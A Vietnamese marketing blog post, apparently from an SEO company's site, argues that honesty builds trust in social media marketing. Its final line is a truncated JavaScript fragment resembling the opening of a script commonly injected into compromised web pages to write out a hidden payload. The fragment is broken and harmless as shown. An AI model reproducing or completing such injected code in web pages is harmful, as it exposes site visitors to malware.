Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Social Media Marketing > Tầm quan trọng của sự thành thật trong Social Marketing

Tầm quan trọng của sự thành thật trong Social Marketing

Chúng ta thường vặn volume ti vi xuống khi có quảng cáo và hầu hết chúng ta đều không mấy chú ý đến những quảng cáo trên tìm kiếm Google. Chúng ta thậm chí dành hẳn cả một buổi sáng để xóa các email hằng ngày từ các website khác nhau mà chúng ta đã đăng ký trước đó.

seo website

Có một bài học ở đây là Marketing truyền thông mạng xã hội và các hoạt động thương mại.  Liệu bạn có dùng Google + hay Google Places cho quảng cáo thị trường ngách đặc biệt hay chỉ phá hoại tất cả mọi thứ qua các tài khoản truyền thông xã hội, bạn có thể nói cho mọi ngườiđiều biết điều mà họ đang quan tâm. Đó là những điều có thực và chắc chắn.

Thật dễ dàng để tìm ra một bài báo mạng nói “thành thật là tất cả” trong marketing mạng xã hội. Những bài báo này rất phổ biến và nổi tiếng, góp nhặt vì mọi người  thường thích thú khi khám phá ra những ý tưởng trước đó trở thành sự thật. Nhưng tại sao lại thế?

Câu trả lời gồm 2 phần.

Thứ nhất, Internet là một bà chủ độc ác và phũ phàng. Nếu bạn đạt được bất cứ sự thành công nào, những người quan tâm sẽ soi xét tất cả những gì bạn nói. Để người ta nhớ đến bạn, bạn sẽ phải post bài lên Twitter hay các công cụ truyền thông khác nhiều lần trong ngày.   Nếu bạn nói điều gì đó sai trái hoặc không đúng sự thật, ai đó sẽ biết được và bạn sẽ bị mất hết sự tin tưởng. Có một chính sách là nên thật thà, nói đúng sự thật và cởi mở là một cách tốt vừa tránh được những lỗi nhỏ và ngăn được những phản ứng tiêu cực.

Không có gì tệ hơn việc dành ra cả đống thời gian, chú tâm và nỗ lực hết mình cho một chiến dịch mà lại trở thành trò đùa trên Internet chỉ vì không thành thật.

Thứ hai, mọi người thường coi marketing mạng xã hội giống như sự tương tác xã hội của một thương hiệu. Đó là sự khác biệt từ  những quảng cáo sáng tạo vì không có bức tường nào ngăn cản. Người đọc sẽ không thể thấy được người làm ra quảng cáo Macy trên một tờ báo nơi chỉ để lại thông tin về công ty. Nhưng, khi chúng ta check in trên Facebook thường xuyên và theo dõi ai đó trên Twitter, những mối quan hệ cá nhân sẽ được phát triển. Đó là sự thật khi có danh sách người theo dõi lên đến con số hàng triệu.

Những bài viết của bạn nên để giống như là đoạn hội thoại tâm sự là cố tình phô bày. Đó là lý do mà các blogger có những câu hỏi hay và sau đó lôi kéo được sự quan tâm của khán giả từ những bình luận trên Facebook. Bạn sẽ không phạm sai lầm  trong những cuộc trò chuyện thân tình về các vấn đề lớn với sự hiểu biết sơ sài về vấn đề đó. Bạn nên duy trì sự thành thật như nhau trên các phương tiện truyền thông đại chúng.

Tính trung thực làm các phương tiện truyền thông xã hội trở nên ý nghĩa và đáng tin cậy. Đừng quên những tác động của sự giao tiếp cởi mở trên tài khoản Google + của bạn. Khách hàng và vòng tròn quan  hệ sẽ đánh giá sản phẩm của bạn và những tác động đó sẽ trở nên hiệu quả hơn.

Dịch Vụ SEO pridio.com

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘